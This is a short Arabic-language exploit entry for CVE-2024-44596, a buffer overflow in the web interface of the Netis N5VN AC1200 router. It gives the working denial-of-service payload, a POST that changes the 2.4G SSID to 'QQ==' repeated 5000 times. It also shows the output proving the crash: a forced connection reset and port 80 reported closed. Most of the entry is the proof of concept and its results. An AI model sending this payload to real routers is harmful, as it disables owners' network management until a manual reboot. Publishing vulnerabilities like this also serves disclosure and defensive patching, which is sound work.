
التاريخ: 05/03/2024
مؤلف الاستغلال: Van Lam Nguyen
فيسبوك: fb.com/vanlam1412
الصفحة الرئيسية للبائع: Netis Systems
الإصدار: Netis N5VN AC1200 V1.0.1.1742
تم الاختبار على: Windows
CVE : CVE-2024-44596
توجد ثغرة تجاوز سعة المخزن المؤقت في راوتر Netis N5VN AC1200 يمكن أن تسمح للمهاجم بتعطيل خادم الويب الذي يعمل على الراوتر عن طريق إرسال طلب مصمم خصيصًا
لاستعادة http (خادم الويب)، يجب على المستخدم إعادة تشغيل الراوتر يدويًا.
طلب POST لتغيير ssid لشبكة Wireless 2.4G ('ssid': 'QQ==' * 5000)
بنجاح: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
nmap 192.168.1.254 -p 80 80/tcp closed http

